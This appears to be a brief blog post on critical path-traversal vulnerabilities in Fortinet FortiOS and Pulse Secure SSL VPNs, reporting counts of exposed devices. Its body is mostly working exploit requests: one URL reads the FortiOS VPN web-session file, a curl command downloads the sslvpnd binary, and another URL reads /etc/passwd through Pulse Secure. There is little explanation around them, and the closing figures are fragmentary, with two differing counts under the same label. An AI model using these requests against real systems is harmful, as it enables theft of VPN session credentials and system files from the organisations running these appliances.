Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet

Valeriy Shevchenko
Sep 2 · 5 min read

FortiOS SSL research

http://example.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession/
curl -k   "https://example.com/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd" > sslvpnd.bin
And our magic backdoor is on the screen

Pulse Secure research

https://example.com/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

Summary

1 180 Fortinet SSL Clients
116 723 Fortinet SSL Clients

Valeriy Shevchenko

Written by

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade